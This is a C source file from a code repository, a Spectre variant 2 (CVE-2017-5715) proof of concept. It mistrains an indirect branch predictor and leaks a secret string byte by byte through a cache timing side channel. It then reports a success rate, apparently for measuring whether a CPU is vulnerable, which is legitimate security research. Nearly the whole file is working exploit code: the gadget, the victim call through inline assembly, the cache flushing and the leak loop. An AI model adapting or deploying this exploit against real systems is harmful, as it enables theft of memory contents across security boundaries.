sk4nz/octopus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
a8612b146a
octopus/spectre_v2.c

206 lines
5.3 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

/* spectre.c - CVE-2017-5715 user-to-user sucess rate measurement
*
* Borrows code from
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
*
* Copyright (c) 2022 Samuel AUBERTIN
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#include "octopus.h"
uint64_t* target; // pointer to indirect call target
// mistrained target of indirect call
int
gadget(char* addr)
{
return channel[*addr * GAP]; // speculative loads fetch data into the cache
}
// safe target of indirect call
int
safe_target(char* addr)
{
return 42;
}
// function that makes indirect call
// note that addr will be passed to gadget via %rdi
int
victim_function(char* addr, int input)
{
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int result, junk = junk;
// set up branch history buffer (bhb) by performing >29 taken branches
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
// for details about how the branch prediction mechanism works
// junk and input used to guarantee the loop is actually run
for (int i = 1; i <= 100; i++) {
input += i;
junk += input & i;
}
// call *target
__asm volatile(
"mov %%rax, %2\n"
"callq *%1\n"
"mov %0, %%eax\n"
: "=r" (result)
: "r" (*target), "rm" (addr)
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
return result & junk;
}
static inline void
leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
{
static int results[256];
int tries, i, j, mix_i;
unsigned int junk = 0;
volatile uint8_t* addr;
char dummy = '@';
#ifdef NOCLFLUSH
__OCTOPUS_NOCLFLUSH_INIT__
#endif
for (i = 0; i < 256; i++) {
results[i] = 0;
channel[i * GAP] = 1;
}
for (tries = 999; tries > 0; tries--) {
// Malicious target
*target = (uint64_t)&gadget;
#ifndef NOMFENCE
_mm_mfence();
#endif
for (j = 50; j > 0; j--) {
junk ^= victim_function(&dummy, 0);
}
#ifndef NOMFENCE
_mm_mfence();
#endif
#ifndef NOCLFLUSH
for (i = 0; i < 256; i++) {
_mm_clflush(&channel[i * GAP]);
}
#else
for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) {
flush_memory_sse(&channel[i * GAP]);
}
}
#endif
#ifndef NOMFENCE
_mm_mfence();
#endif
// change to safe target
*target = (uint64_t)&safe_target;
#ifndef NOMFENCE
_mm_mfence();
#endif
// flush target to prolong misprediction interval
#ifndef NOCLFLUSH
_mm_clflush((void*) target);
#else
flush_memory_sse((void*) target);
#endif
#ifndef NOMFENCE
_mm_mfence();
#endif
// call victim
//printf("victim with %p\n", target_addr);
junk ^= victim_function(target_addr, 0);
#ifndef NOMFENCE
_mm_mfence();
#endif
// now, the value of *addr_to_read should be cached even though
// the logical execution path never calls gadget()
__OCTOPUS_TIMINGS__
}
results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j;
score[0] = results[j];
}
int
main(int argc, char** argv)
{
int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
uint8_t value[2];
char* secret_addr = secret;
__OCTOPUS_ARGS__
target = (uint64_t*)malloc(sizeof(uint64_t));
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1;
}
#endif
while (--len >= 0) {
leak(secret_addr++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
successes++;
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
} else {
fprintf(stderr, "\033[31m?\033[0m");
}
}
fprintf(stderr, "\n");
if (json) {
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
#ifndef NORDTSCP
printf("\"rdtscp\": true, ");
#else
printf("\"rdtscp\": false, ");
#endif
#ifndef NOMFENCE
printf("\"mfence\": true, ");
#else
printf("\"mfence\": false, ");
#endif
#ifndef NOCLFLUSH
printf("\"clflush\": true ");
#else
printf("\"clflush\": false ");
#endif
printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
}
fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP
fprintf(stderr, "RDTSCP ");
#else
fprintf(stderr, "RDTSC ");
#endif
#ifndef NOMFENCE
fprintf(stderr, "MFENCE ");
#endif
#ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH ");
#endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
free(target);
return 0;
}
Reference in New Issue View Git Blame Copy Permalink